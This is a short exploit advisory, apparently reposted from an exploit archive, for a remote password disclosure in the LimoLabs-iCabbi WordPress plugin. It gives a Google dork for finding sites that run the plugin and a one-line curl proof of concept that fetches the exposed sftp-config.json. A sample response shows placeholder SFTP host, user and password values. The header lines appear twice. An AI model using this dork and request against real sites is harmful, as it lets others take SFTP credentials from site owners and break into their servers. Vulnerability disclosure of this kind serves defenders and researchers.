# Exploit Title: Wordpress Plugin LimoLabs-iCabbi Remote Password Disclosure
# Google Dork: inurl:"plugins/limolabs-icabbi"
# Date: 22/07/2018
# Exploit Author: Gabriel Lipski # Exploit Title: Wordpress Plugin LimoLabs-iCabbi Remote Password Disclosure
# Google Dork: inurl:"plugins/limolabs-icabbi"
# Date: 22/07/2018
# Exploit Author: Gabriel Lipski ( gabriel.lipski[AT]protonmail.com )
# Vendor Homepage: https://www.icabbi.com
# Tested on: Ubuntu 12.04.5 / Debian 9.4
* PoC:
$ curl http://<TARGET>/wp-content/plugins/limolabs-icabbi/sftp-config.json
* Response:
...
"host": "1.3.3.7",
"user": "foo",
"password": "bar",
"port": "22",
...
WordPress LimoLabs 1.0.0 Remote Password Disclosure
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 247